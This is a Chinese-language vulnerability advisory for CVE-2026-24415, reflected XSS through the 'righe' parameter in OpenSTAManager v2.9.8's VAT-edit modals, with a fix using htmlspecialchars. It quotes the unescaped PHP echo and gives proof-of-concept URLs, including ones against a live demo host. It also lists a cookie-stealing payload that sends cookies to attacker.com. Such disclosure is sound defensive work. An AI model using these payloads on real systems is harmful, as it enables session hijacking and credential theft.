| 字段 | 详情 |
|---|---|
| CVE ID | CVE-2026-24415 |
| 严重性 | 中危 |
| 安全公告 | 查看公告 |
| 发现者 | Lukasz Rybak |
OpenSTAManager v2.9.8 中存在多个反射型跨站脚本(XSS)漏洞,允许未经身份验证的攻击者通过精心构造的 URL 参数在其他用户的浏览器上下文中执行任意 JavaScript 代码,可能导致会话劫持、凭据窃取和未授权操作。
易受攻击的参数: righe(GET)
OpenSTAManager v2.9.8 在发票/订单/合同修改模态框中包含多个反射型 XSS 漏洞。应用程序未能在将来自 righe GET 参数的用户输入反映到 HTML 输出之前对其进行正确过滤。
漏洞代码位置:
文件:/modules/contratti/modals/modifica_iva.php(第 125 行)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
$_GET['righe'] 参数未经任何使用 htmlspecialchars() 或等效函数的过滤,被直接输出到 HTML value 属性中。这允许攻击者突破属性上下文并注入任意 HTML/JavaScript。
所有受影响文件:
/modules/contratti/modals/modifica_iva.php - 第 125 行,第 167 行/modules/preventivi/modals/modifica_iva.php - 第 125 行,第 167 行/modules/fatture/modals/modifica_iva.php - 第 121 行,第 161 行/modules/ddt/modals/modifica_iva.php - 第 125 行,第 167 行/modules/ordini/modals/modifica_iva.php - 第 125 行,第 167 行/modules/interventi/modals/modifica_iva.php - 第 125 行,第 167 行前提条件:
步骤 1:登录
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
步骤 2:触发 XSS 在浏览器中访问以下 URL(或使用带有 cookie 的 curl):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
测试过的 URL(全部存在漏洞):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>预期结果: JavaScript 警报弹窗显示当前会话 cookie,确认代码已执行。
HTML 输出(已在在线实例上验证):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
验证:
备选载荷:
会话窃取:"><script>fetch('https://attacker.com/?c='+document.cookie)</script>
受影响用户: 所有可以访问合同、发票、报价或订单模块的已认证用户。
攻击场景:
推荐修复方案:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
将此修复应用于“详细信息”部分列出的所有受影响文件。
该 CVE 已按照协调漏洞披露实践进行负责任地披露。此处提供的信息仅用于教育和防御目的。